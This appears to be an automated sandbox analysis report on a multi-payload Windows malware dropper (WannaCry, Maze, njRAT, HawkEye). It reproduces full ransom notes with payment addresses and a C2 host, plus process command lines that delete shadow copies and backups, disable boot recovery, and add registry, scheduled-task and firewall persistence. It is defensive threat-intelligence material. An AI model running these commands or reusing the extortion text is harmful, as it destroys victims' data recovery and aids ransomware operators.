Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    04-05-2022 12:42

General

  • Target

    RIP_YOUR_PC_LOL.exe

  • Size

    5.8MB

  • MD5

    637e757d38a8bf22ebbcd6c7a71b8d14

  • SHA1

    0e711a8292de14d5aa0913536a1ae03ddfb933ec

  • SHA256

    477c13d4ca09fdb7fea6487641c6a904d4dee1adecd74ac42e0b00a3842503f9

  • SHA512

    e7a3576370967a4cbd53c33bf65ae26881cca3f713df5bdbcdc9ed76b79e9102c26d5bf940fc2a0e880c7b7ab83c13dcad24608d23981cbcaf551d4e800c67ac

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\@Please_Read_Me@.txt

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �
Wallets

115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Extracted

Path

C:\DECRYPT-FILES.txt

Family

maze

Ransom Note
Attention! ---------------------------- | What happened? ---------------------------- We hacked your network and now all your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms. You cannot access the files right now. But do not worry. You can get it back! It is easy to recover in a few steps. We have also downloaded a lot of private data from your network, so in case of not contacting us as soon as possible this data will be released. If you do not contact us in a 3 days we will post information about your breach on our public news website and after 7 days the whole downloaded info. To see what happens to those who don't contact us, google: * Southwire Maze Ransomware * MDLab Maze Ransomware * City of Pensacola Maze Ransomware After the payment the data will be removed from our disks and decryptor will be given to you, so you can restore all your files. ---------------------------- | How to contact us and get my files back? ---------------------------- The only method to restore your files and be safe from data leakage is to purchase a unique for you private key which is securely stored on our servers. To contact us and purchase the key you have to visit our website in a hidden TOR network. There are general 2 ways to reach us: 1) [Recommended] Using hidden TOR network. a) Download a special TOR browser: https://www.torproject.org/ b) Install the TOR Browser. c) Open the TOR Browser. d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/6de30ce638de491 e) Follow the instructions on this page. 2) If you have any problems connecting or using TOR network a) Open our website: https://mazedecrypt.top/6de30ce638de491 b) Follow the instructions on this page. Warning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. On this page, you will see instructions on how to make a free decryption test and how to pay. Also it has a live chat with our operators and support team. ---------------------------- | What about guarantees? ---------------------------- We understand your stress and worry. So you have a FREE opportunity to test a service by instantly decrypting for free three files from every system in your network. If you have any problems our friendly support team is always here to assist you in a live chat! P.S. Dear system administrators, do not think you can handle it by yourself. Inform leadership as soon as possible. By hiding the fact of the breach you will be eventually fired and sometimes even sued. ------------------------------------------------------------------------------- THIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU ---BEGIN MAZE KEY--- dTZdNUjaHEYuZYKa/SoHEJwdhoG+/9Fartt6R9U66AmoY5aWmOQu2FU3n5KvRIQpHLEEnTyhZCB5WA/Ddp0/LsdlrrJaIKjF6rPqflMmXlYxp8X2rCP0p/SXck8G1mn/MaC9H8f8q6FaU+YoBt5SslIFlV26kWFC4T0ebJ+/rm7tNIzPChwSfeS1WqOwbRSayys8LlfV1wQqxa9ltDTP9WLjUZeFRp9b7ZQ/zNTJFKbic1+0MAPDPss09oK7b3VJtpteS2VLnqFKXamHtA14w5g9PGAa2r9zTj8xOHXElfutYD1r1dlfhqLWe4FcT5zjdJyE7Qt6Oyz/zBRDPfvxNjl4WQde1PKNArtAE/EI36rhtgOGEUGPXFHY657Q1tJwtEBK542RMb4pe8Isursa03gLhWYBCyAme9bZ5dam21QKNRBSqSNo1aXzwLplA3litTja8GzbkjZjazf+Vi6VogU63ZiwCL0e6mURH+PdA09yyBGf3Dv/snXkV2JM9rW/0hkXKPLKozTK63YGo5Y7Wr92i/UUBj8trvf+Wma9q6c+0aBwsm8Cv5/zLJXGCVjbRwziL30wRsk1oU/Q5qgqcOTXULWXwALfqI/OF01bunchzICPRXgAn27FT0bt1YfJzjco/vR91c61ZDBcNxkj3jPvgqxiwjPdwIDw/z0ZiBVUE+qnUumLCmcDwmPGwmGr/W9iUSPFXjN/2W4qR04sl+WR/BBH8aG3nqBVsiMMNVy0ZJkrO4vDXagcoC/a5Yz9LNawe761TCnK8bmUYWK8SZhmwdBzkgYaCMcdjpRB5I/qWP3p5gzbIPc0JxvZYXoD/6ecqvreIMEwWXm5KO99Kjn5VAFWIg5k/Xmcbcg22xbkl6VqcrnbAE82BFDmjYgOuEBswG2RBAkmw0MDbWW1BPaSyeRsu9RqP9Excx8KRifD4wO1EZgunsrynEwdBvHlAA7BOVlRgrmH3kah6eSSI1YZIrQumv5FXXPCxb29Mt2QWKfApWR1Oco48yCzstra8pZWfDZn2mxtqNrYlzXZ2+chtQ7eEfMEBnFURhDWC401AJGbhCeaRsV8EQi1hK5aUVVi+WgwiG9XUeOr3hkp07KZDqbZ0cEzNb02Dh+XUjTKRdyVG59uJl8lJ4hH0csJ7nZ1kbBmxCNHAkc2p0Sd0ElQ3tZ1Y80D1NxQXFUcHM/EEMgmyoINy8yZ42bk6ScNkWSP8IF2Gt+xX1OkldXmM6icsXjZj7jyIvIDbA8ruHWYeZOgv2V1g1qmJGp03fKr/jLefSeOb2AisvxIryQ2+f69I4TZSzIKeMNRilfZisY7dKkv60SJ6KbSkBZoBAOAxX+W7fvtVcRs6g0SItjdJkRZRe2DqIQVq2a6/4Da99/knipL1ML1hyKZwuZTIGiuzCu7NKz9RgtNPaPxVZjQ4PjpJxU6yfzfR3jePpgb5y/MQx8lVRCy18bbybKP3PgMHaEzhRnXJFoTMhqfyieJynB+OWmmRmEqV0ZFJ63ml2dme4Y2yU75rVUB8nm5vwA2oCUDBdWl//69xjnUGNobU0XsKkxzv+lfIwXpCDpz4Rs23/0Go7+t6eG3HTORGRyiK4HJ2JvYbwihpJMn1yOB+bcl/joOomfVPpBhgyQh294RV9rKmDGaqCxxHS4Kn+VO7d2K9Ll003fvdKAil3MhuDPh0m6Rga38SmWEZ/dRbMm2DLmwjGLcZui7IQfOYj7FLTo7/zh+IYT0OLy+WohZpY8vykfv84ErWYD84BfJN7+cJS2XhBQSFqjw8SDJwzeA1CMKwja+ak+tp3oaeZo3/SY5qnUOLP+q1W7V9DZeNwPuB4bi23XCdjTJnV+bFUR1FwyzeLNPmZjJAXI+0IBYi5HKQ4/yKkhmLQtXT73nufJZZ6q2aQtoXV1sf941mP9CK8YWc/qTXLQcQiFoLI58lMJ63eB6oGJUB7XrzBtGrrZAwsvtvDAfoXGrRDJC4xSzHgvx+snRygB6XQjplyEgm5Jr0QSXfMImlV97WBDd+C4Jv7TYuPnwqJ1IhpXnTvZm4MlBr2CnALrkUEx6uPN5yhUZL5LgdqbUtvt+7Y6CVCWfDQHQB70DwCRQaiT8Rz+SGYBBEHm0a9emAKpVzUMUcah1hHs0mv0aqWnndvYR9zQsbOcifmt8+E/Thkltu8f2tedt3zBbQjlrzWa9XZwuhCv1zcgI3DtJZjNxQHzVT9s11/1vcOGChPN4EHGarVPSyDJiowogNgBkAGUAMwAwAGMAZQA2ADMAOABkAGUANAA5ADEAAAAQgGAaDEEAZABtAGkAbgAAACImVwBPAFIASwBHAFIATwBVAFAAXABUAFcASgBZAFgATwBVAEwAAAAqDG4AbwBuAGUAfAAAADIsVwBpAG4AZABvAHcAcwAgADEAMAAgAEUAbgB0AGUAcgBwAHIAaQBzAGUAAAA6KHwAZABlAHAAcgBlAGMAYQB0AGUAZAAgAD4AIAB2ADIALgAzAHwAAABCNnwAQwBfAEYAXwAyADAANAA1ADYALwAyADYAMQA4ADQAMQB8AEQAXwBVAF8AMAAvADAAfAAAAEgAUEBYiQhgiQhoiQhw2oLacngMgAEBigEFMi4zLjE= ---END MAZE KEY---
URLs

http://aoacugmutagkwctu.onion/6de30ce638de491

https://mazedecrypt.top/6de30ce638de491

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    files.000webhost.com
  • Port:
    21
  • Username:
    fcb-aws-host-4

Extracted

Family

njrat

Version

im523

Botnet

Bot

C2

DanilWhiteNjrat-57320.portmap.host:57320

Mutex

802f813d3810aa536753efbd3390b541

Attributes
  • reg_key

    802f813d3810aa536753efbd3390b541

  • splitter

    |'|'|

Signatures

  • HawkEye

    HawkEye is a malware kit that has seen continuous development since at least 2013.

  • Maze

    Ransomware family also known as ChaCha.

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs
  • Wannacry

    WannaCry is a ransomware cryptoworm.

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • suricata: ET MALWARE Maze/ID Ransomware Activity

    suricata: ET MALWARE Maze/ID Ransomware Activity

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • NirSoft MailPassView 6 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 6 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 10 IoCs
  • Executes dropped EXE 21 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 9 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Office macro that triggers on suspicious action 1 IoCs

    Office document macro which triggers in special circumstances - often malicious.

  • Suspicious Office macro 1 IoCs

    Office document equipped with macros.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 15 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Uses the VBS compiler for execution 1 TTPs
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 10 IoCs
  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 28 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 5 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 23 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 6 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe
    "C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3124
    • C:\Users\Admin\Desktop\1.exe
      "C:\Users\Admin\Desktop\1.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2928
      • C:\Windows\system32\cmd.exe
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\695D.tmp\695E.tmp\695F.bat C:\Users\Admin\Desktop\1.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3788
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2bB2s6
          4⤵
          • Adds Run key to start application
          • Enumerates system info in registry
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4552
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa59c346f8,0x7ffa59c34708,0x7ffa59c34718
            5⤵
              PID:1628
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,12370527672765014916,11213257922967060572,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
              5⤵
                PID:4876
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,12370527672765014916,11213257922967060572,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2768 /prefetch:8
                5⤵
                  PID:4316
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,12370527672765014916,11213257922967060572,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
                  5⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3964
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,12370527672765014916,11213257922967060572,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
                  5⤵
                    PID:3824
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,12370527672765014916,11213257922967060572,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
                    5⤵
                      PID:2452
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2084,12370527672765014916,11213257922967060572,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5500 /prefetch:8
                      5⤵
                        PID:1820
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,12370527672765014916,11213257922967060572,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:1
                        5⤵
                          PID:4472
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2084,12370527672765014916,11213257922967060572,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5816 /prefetch:8
                          5⤵
                            PID:2356
                    • C:\Users\Admin\Desktop\10.exe
                      "C:\Users\Admin\Desktop\10.exe"
                      2⤵
                      • Executes dropped EXE
                      • Drops startup file
                      • Suspicious use of WriteProcessMemory
                      PID:2336
                      • C:\Windows\SysWOW64\attrib.exe
                        attrib +h .
                        3⤵
                        • Views/modifies file attributes
                        PID:3664
                      • C:\Windows\SysWOW64\icacls.exe
                        icacls . /grant Everyone:F /T /C /Q
                        3⤵
                        • Modifies file permissions
                        PID:4628
                      • C:\Users\Admin\Desktop\taskdl.exe
                        taskdl.exe
                        3⤵
                        • Executes dropped EXE
                        PID:3612
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c 169511651675374.bat
                        3⤵
                          PID:3520
                          • C:\Windows\SysWOW64\cscript.exe
                            cscript.exe //nologo m.vbs
                            4⤵
                              PID:624
                          • C:\Users\Admin\Desktop\taskdl.exe
                            taskdl.exe
                            3⤵
                            • Executes dropped EXE
                            PID:3052
                          • C:\Users\Admin\Desktop\@WanaDecryptor@.exe
                            @WanaDecryptor@.exe co
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of SetWindowsHookEx
                            PID:3584
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c start /b @WanaDecryptor@.exe vs
                            3⤵
                              PID:2908
                              • C:\Users\Admin\Desktop\@WanaDecryptor@.exe
                                @WanaDecryptor@.exe vs
                                4⤵
                                • Executes dropped EXE
                                • Suspicious use of SetWindowsHookEx
                                PID:1676
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                  5⤵
                                    PID:1272
                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                      wmic shadowcopy delete
                                      6⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4896
                              • C:\Users\Admin\Desktop\taskse.exe
                                taskse.exe C:\Users\Admin\Desktop\@WanaDecryptor@.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4176
                              • C:\Users\Admin\Desktop\@WanaDecryptor@.exe
                                @WanaDecryptor@.exe
                                3⤵
                                • Executes dropped EXE
                                • Sets desktop wallpaper using registry
                                • Suspicious use of SetWindowsHookEx
                                PID:1244
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "dlkzpibqectdraf799" /t REG_SZ /d "\"C:\Users\Admin\Desktop\tasksche.exe\"" /f
                                3⤵
                                  PID:4504
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "dlkzpibqectdraf799" /t REG_SZ /d "\"C:\Users\Admin\Desktop\tasksche.exe\"" /f
                                    4⤵
                                    • Adds Run key to start application
                                    • Modifies registry key
                                    PID:1760
                                • C:\Users\Admin\Desktop\taskdl.exe
                                  taskdl.exe
                                  3⤵
                                  • Executes dropped EXE
                                  PID:5112
                                • C:\Users\Admin\Desktop\taskse.exe
                                  taskse.exe C:\Users\Admin\Desktop\@WanaDecryptor@.exe
                                  3⤵
                                  • Executes dropped EXE
                                  PID:1304
                                • C:\Users\Admin\Desktop\@WanaDecryptor@.exe
                                  @WanaDecryptor@.exe
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetWindowsHookEx
                                  PID:716
                                • C:\Users\Admin\Desktop\taskdl.exe
                                  taskdl.exe
                                  3⤵
                                  • Executes dropped EXE
                                  PID:512
                                • C:\Users\Admin\Desktop\taskse.exe
                                  taskse.exe C:\Users\Admin\Desktop\@WanaDecryptor@.exe
                                  3⤵
                                  • Executes dropped EXE
                                  PID:1388
                                • C:\Users\Admin\Desktop\@WanaDecryptor@.exe
                                  @WanaDecryptor@.exe
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetWindowsHookEx
                                  PID:2940
                                • C:\Users\Admin\Desktop\taskdl.exe
                                  taskdl.exe
                                  3⤵
                                  • Executes dropped EXE
                                  PID:972
                              • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
                                "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\3.xlsx"
                                2⤵
                                  PID:2916
                                • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                                  "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\2.doc" /o ""
                                  2⤵
                                    PID:3280
                                  • C:\Users\Admin\Desktop\5.exe
                                    "C:\Users\Admin\Desktop\5.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Checks computer location settings
                                    PID:4208
                                    • C:\ProgramData\system.exe
                                      "C:\ProgramData\system.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      • Drops startup file
                                      • Adds Run key to start application
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2040
                                      • C:\Windows\SysWOW64\netsh.exe
                                        netsh firewall add allowedprogram "C:\ProgramData\system.exe" "system.exe" ENABLE
                                        4⤵
                                          PID:560
                                    • C:\Users\Admin\Desktop\6.exe
                                      "C:\Users\Admin\Desktop\6.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Checks computer location settings
                                      • Adds Run key to start application
                                      • Checks whether UAC is enabled
                                      • Drops file in System32 directory
                                      • Drops file in Program Files directory
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      • System policy modification
                                      PID:3572
                                      • C:\Users\Default User\fontdrvhost.exe
                                        "C:\Users\Default User\fontdrvhost.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Checks whether UAC is enabled
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        • System policy modification
                                        PID:3752
                                    • C:\Users\Admin\Desktop\7.exe
                                      "C:\Users\Admin\Desktop\7.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      • Suspicious use of SetThreadContext
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1336
                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
                                        3⤵
                                        • Accesses Microsoft Outlook accounts
                                        PID:204
                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
                                        3⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:1692
                                    • C:\Users\Admin\Desktop\8.exe
                                      "C:\Users\Admin\Desktop\8.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies extensions of user files
                                      • Drops startup file
                                      • Sets desktop wallpaper using registry
                                      • Drops file in Program Files directory
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:3892
                                      • C:\Windows\system32\wbem\wmic.exe
                                        "C:\pwmlx\c\g\..\..\..\Windows\i\qjcj\eyh\..\..\..\system32\jm\..\wbem\tee\j\..\..\wmic.exe" shadowcopy delete
                                        3⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3952
                                    • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                                      "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\9.docm" /o ""
                                      2⤵
                                        PID:4664
                                    • C:\Windows\System32\CompPkgSrv.exe
                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                      1⤵
                                        PID:1988
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Default User\fontdrvhost.exe'" /rl HIGHEST /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Creates scheduled task(s)
                                        PID:1976
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper\msedge.exe'" /rl HIGHEST /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Creates scheduled task(s)
                                        PID:4280
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\enterprisecsps\RuntimeBroker.exe'" /rl HIGHEST /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Creates scheduled task(s)
                                        PID:1652
                                      • C:\Windows\system32\vssvc.exe
                                        C:\Windows\system32\vssvc.exe
                                        1⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4392
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\unregmp2\dllhost.exe'" /rl HIGHEST /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Creates scheduled task(s)
                                        PID:1664
                                      • C:\Windows\system32\AUDIODG.EXE
                                        C:\Windows\system32\AUDIODG.EXE 0x2f4 0x4c8
                                        1⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4548
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                        1⤵
                                          PID:4064
                                        • C:\Windows\system32\taskmgr.exe
                                          "C:\Windows\system32\taskmgr.exe" /4
                                          1⤵
                                          • Drops startup file
                                          • Checks SCSI registry key(s)
                                          • Modifies registry class
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious behavior: GetForegroundWindowSpam
                                          • Suspicious use of FindShellTrayWindow
                                          • Suspicious use of SendNotifyMessage
                                          PID:972

                                        Network

                                        MITRE ATT&CK Matrix ATT&CK v6

                                        Execution

                                        Scripting

                                        1
                                        T1064

                                        Scheduled Task

                                        1
                                        T1053

                                        Persistence

                                        Modify Existing Service

                                        1
                                        T1031

                                        Registry Run Keys / Startup Folder

                                        1
                                        T1060

                                        Scheduled Task

                                        1
                                        T1053

                                        Hidden Files and Directories

                                        1
                                        T1158

                                        Privilege Escalation

                                        Bypass User Account Control

                                        1
                                        T1088

                                        Scheduled Task

                                        1
                                        T1053

                                        Defense Evasion

                                        Bypass User Account Control

                                        1
                                        T1088

                                        Disabling Security Tools

                                        1
                                        T1089

                                        Modify Registry

                                        5
                                        T1112

                                        File Deletion

                                        1
                                        T1107

                                        File Permissions Modification

                                        1
                                        T1222

                                        Scripting

                                        1
                                        T1064

                                        Hidden Files and Directories

                                        1
                                        T1158

                                        Credential Access

                                        Credentials in Files

                                        1
                                        T1081

                                        Discovery

                                        Query Registry

                                        3
                                        T1012

                                        System Information Discovery

                                        5
                                        T1082

                                        Peripheral Device Discovery

                                        1
                                        T1120

                                        Collection

                                        Data from Local System

                                        1
                                        T1005

                                        Email Collection

                                        1
                                        T1114

                                        Command and Control

                                        Web Service

                                        1
                                        T1102

                                        Impact

                                        Inhibit System Recovery

                                        1
                                        T1490

                                        Defacement

                                        1
                                        T1491

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\ProgramData\system.exe
                                          Filesize

                                          37KB

                                          MD5

                                          e817d74d13c658890ff3a4c01ab44c62

                                          SHA1

                                          bf0b97392e7d56eee0b63dc65efff4db883cb0c7

                                          SHA256

                                          2945881f15e98a18d27108a29963988190853838f34faf3020e6c3c97342672d

                                          SHA512

                                          8d90ef308c1e0b7e01e7732e2cd819f07bfc1ef06e523efa81694ced75550c9f1be460fc9de412faeb96273a6492580402ab9c9538ed441fc26d96b6785e7815

                                        • C:\ProgramData\system.exe
                                          Filesize

                                          37KB

                                          MD5

                                          e817d74d13c658890ff3a4c01ab44c62

                                          SHA1

                                          bf0b97392e7d56eee0b63dc65efff4db883cb0c7

                                          SHA256

                                          2945881f15e98a18d27108a29963988190853838f34faf3020e6c3c97342672d

                                          SHA512

                                          8d90ef308c1e0b7e01e7732e2cd819f07bfc1ef06e523efa81694ced75550c9f1be460fc9de412faeb96273a6492580402ab9c9538ed441fc26d96b6785e7815

